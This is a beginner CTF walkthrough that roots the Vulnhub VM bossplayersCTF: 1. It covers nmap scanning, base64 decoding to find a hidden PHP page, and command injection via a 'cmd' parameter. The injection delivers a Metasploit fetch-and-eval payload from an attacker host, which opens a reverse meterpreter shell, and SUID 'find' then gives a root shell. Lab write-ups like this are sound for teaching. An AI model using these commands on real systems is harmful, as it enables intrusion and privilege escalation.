bossplayersCTF: 1 walkthrough vulnhub CTF | bossplayersCTF: 1 Vulnhub writeup
In this article, we are solving bossplayersCTF: 1 Vulnhub CTF the motto of the lab is the root account access this VM is created by Cuong Nguyen.
you can Download here this VM here
Description bossplayersCTF: 1
Aimed at Beginner Security Professionals who want to get their feet wet into doing some CTF’s. It should take around 30 minutes to root.
Let’s start by scanning the network to find our target. In my case, the IP is 192.168.1.109
Our Next step is scanning all port and services our target machine.
nmap -A 192.168.1.109
Our Nmap scanning is complete and we see the target machine open port 22 SSH, and 80 HTTP
we find that port 80 is running http, so we open the IP in our browser.
The front page I didn’t see any important stuff I move on our next step checking the source code of the webpage and last of the page I found a base64 encode the value.
echo "WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK" |base64 -d
echo "ZDI5eWEybHVaMmx1Y0hKdlozSmxjM011Y0dod0NnPT0K" |base64 -d
Last time decode and we see some interesting php file location
echo "d29ya2luZ2lucHJvZ3Jlc3MucGhwCg==" |base64 -d
and I tried to open this file our browser and it shows me system install file and Outstanding and we see a text Test ping command comment
we tried to open the passwd file using cat command through the URL and we see the target passwd file that’s mean this URL is a vulnerable command injection
we are continuing with Metasploit’s web delivery Module to compromise the host machine in order to obtain a reverse connection.
set target 1 set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.18 set lport 4545 run
This will generate a malicious PHP code which you’ll use for command execution on the web URL I copy the malicious code and paste it inside the URL and hit enter
http://192.168.1.109/workingprogress.php?cmd=php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.1.18:8080/syOqX0Xl7'));"
we see the terminal new meterpreter session is open
After running the shell command we see a blank shell
Importing spawn shell through python3 run this command
python3 -c 'import pty;pty.spawn("/bin/bash")'
I start to enumerate the target machine but I didn’t find an important file directory
cd cuong ls -lsa
Moving on, privilege escalation By using the following command you can enumerate all binaries file having SUID permissions: set
find / -type f -perm -u=s 2>/dev/null
we see the many files but I focus on find command I search on google and I found a find command privilege escalation script
/usr/bin/find . -exec /bin/bash -p \; -quit
I move on the root user home directory ls command to we see our root flag
cd /root ls
Reading root Flag